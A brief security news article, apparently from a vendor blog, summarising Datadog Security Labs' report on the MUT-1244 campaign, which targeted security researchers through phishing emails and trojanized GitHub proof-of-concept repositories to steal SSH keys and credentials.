Security researchers at Datadog Security Labs have uncovered a campaign targeting security professionals and researchers by a threat actor dubbed MUT-1244 (Mysterious Unattributed Threat).
Security researchers at Datadog Security Labs have uncovered a campaign targeting security professionals and researchers by a threat actor dubbed MUT-1244 (Mysterious Unattributed Threat).
The attackers used phishing emails and created fake repositories on GitHub disguised as legitimate proof-of-concept (PoC) code for known vulnerabilities. These repositories contained hidden malicious code that infiltrated targeted systems upon execution.
Delivery Methods
The attackers used two primary modes to deliver the payload. The first attack vector was a targeted phishing campaign that put academics in the crosshairs by using emails disguised as critical kernel updates. In order to obtain target email addresses, the attackers scraped 2,758 email addresses from arXiv. The attackers then launched an email campaign with emails containing instructions that prompted victims to execute shell commands, which installed the malware.
The second attack vector was based on trojanized GitHub repositories where attackers created numerous fake GitHub accounts, publishing seemingly legitimate proof-of-concept (PoC) exploits for known CVEs. When in reality these repositories concealed malicious code using various techniques. These included backdoored configuration files, embedding payloads within PDF documents, utilizing Python droppers to execute the malware, and including malicious npm packages as dependencies.
Regardless of how the attackers gained access, the second stage was the same: a malicious payload intended to establish persistent access to compromised systems, access confidential information, and exfiltrate data for the attackers' use. This payload could steal sensitive data like SSH keys and AWS credentials and even keep track of the victim's command history.
To the researchers' surprise, the attackers made a critical mistake: they left hardcoded credentials within the payload, granting access to the storage locations of the stolen data.
Impact
The MUT-1244 campaign has compromised and continues to compromise dozens of security professionals, including red teamers and researchers, resulting in the theft of sensitive data such as private keys and credentials. Researchers have found that over 390,000 potentially valid WordPress credentials were exfiltrated. It is likely that MUT-1244 acquired these credentials from other malicious actors, likely through dark web marketplaces, and then used a trojanized credential checker to validate and further compromise them.
Conclusion:
The MUT-1244 campaign is a reminder that attackers are getting better at targeting security researchers with easily accessible, seemingly harmless tools. The big takeaway here is to regularly vet your tools and sources—and that includes integrating automated threat intelligence feeds to proactively stay ahead of such threats. Security researchers are especially at risk because of their broad access, high privileges, and potential knowledge of unpatched vulnerabilities. Such campaigns should be a reminder of the importance of a "secure by design" approach, ensuring security is built into all systems, even those often neglected, like internal tools or less critical infrastructure.
Want your digital assets to be protected?
CyberShelter provides innovative and modern cybersecurity products and niche services to individuals and organization against all kinds of cyber threats.
For the latest cyber threats and the latest hacking news please follow us on Facebook, Linkedin, and Twitter.